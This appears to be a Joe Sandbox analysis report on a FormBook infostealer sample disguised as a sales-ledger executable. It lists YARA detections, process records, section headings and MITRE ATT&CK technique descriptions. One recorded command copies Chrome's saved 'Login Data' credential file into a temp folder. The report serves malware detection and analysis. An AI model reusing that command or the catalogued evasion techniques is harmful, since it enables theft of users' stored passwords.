MD5 hash:	2879B30A164B9F7671B5E6B2E9F8DFDA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000020.00000002.478765865.0000000002FE8000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000020.00000002.478213740.0000000002F10000.00000004.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000020.00000002.478213740.0000000002F10000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000020.00000002.478213740.0000000002F10000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000020.00000002.474991330.0000000002B10000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	moderate

Analysis Process: cmd.exe PID: 2644 Parent PID: 6856

General

Start time:	14:40:43
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	/c copy 'C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data' 'C:\Users\user\AppData\Local\Temp\DB1' /V
Imagebase:	0x380000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exe PID: 3468 Parent PID: 2644

General

Start time:	14:40:43
Start date:	12/04/2021
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b2800000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to collect elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Application logs, Process monitoring, Windows Error Reporting
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	BIOS, MBR, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report Require your Sales Ledger from 01-April-2020.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: FormBook

Yara Overview

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Network Behavior

Snort IDS Alerts

Network Port Distribution

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre